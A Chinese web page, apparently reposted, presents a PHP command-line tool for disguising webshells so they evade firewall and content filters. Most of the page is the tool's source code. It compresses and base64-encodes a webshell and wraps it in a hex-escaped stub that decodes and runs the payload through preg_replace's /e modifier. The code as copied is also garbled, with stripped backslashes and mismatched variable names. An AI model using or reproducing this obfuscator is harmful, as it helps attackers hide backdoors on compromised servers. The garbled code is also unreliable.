lostwolf写的 这不是webshell,只是个webshell免杀工具 切勿当初webshell使用 仅限免杀phpwebshell 该工具运行在 cli 模式! 如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马! 任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙 <div class="codetitle"><a style="CURSOR: pointer" data="70194" class="copybut" id="copybut70194" onclick="doCopy('code70194')"> 代码如下:<div class="codebody" id="code70194"> <?php / Title: PHP shell nokill T00L Blog: exploit-db.blogcn.com / error_reporting(0); @ini_set('memory_limit','-1'); set_time_limit(0); $toolname="$argv[0]"; if ($argc<2) { baner($toolname); die; } $input_file= trim($argv[1]); $outputfile='nokill'.$input_file; if (file_exists($input_file)) { No_kill_c0de($input_file,$output_file); echo "PHP shell nokill T00Lrn"; echo "Blog: exploit-db.blogcn.comrn"; echo "Input: {$input_file}rn"; $file_full_path=dirname(FILE).DIRECTORY_SEPARATOR.$output_file; echo "[+] Generate success!rn"; echo "Saved to {$file_full_path}"."rn"; } else { echo "PHP shell nokill T00Lrn"; echo "Blog: exploit-db.blogcn.comrn"; die("[-] Failed ! The File $input_file does not exist"); } function No_kill_c0de($input_file,$output_file){ $no_whitespace=php_strip_whitespace($input_file); $no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>'); $enfile=base64_encode(gzdeflate($no_php_tag)); $shellcode="x3cx3fx70x68x70xdxa"; $shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."xdxa"; $shellcode.="x24x62x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x66x27x2cx22x22x2cx22x62x66x61x66x73x66x65x66x36x66x34x66x5fx66x66x64x66x66x65x66x66x63x66x66x6fx66x66x64x66x66x65x66x22x29x3bxdxax24x67x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x58x27x2cx27x27x2cx27x67x58x58x7ax58x58x69x58x58x6ex58x58x58x58x66x58x58x58x6cx58x58x61x58x58x58x74x58x58x58x58x58x65x27x29x3bxdxax70x72x65x67x5fx72x65x70x6cx61x63x65x28x27x5cx27x61x5cx27x65x69x73x27x2cx27x65x27x2ex27x76x27x2ex27x61x27x2ex27x6cx27x2ex27x28x24x67x28x24x62x28x24x65x6ex66x69x6cx65x29x29x29x27x2cx27x61x27x29x3bxdxa"; $shellcode.="x3fx3e"; file_put_contents("$output_file",$shellcode); } function baner($toolname){ echo "PHP shell nokill T00Lrn"; echo "Blog: exploit-db.blogcn.comrn"; echo "Usage: {$toolname} phpwebshellrn"; } ?>
(编辑:安卓应用网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|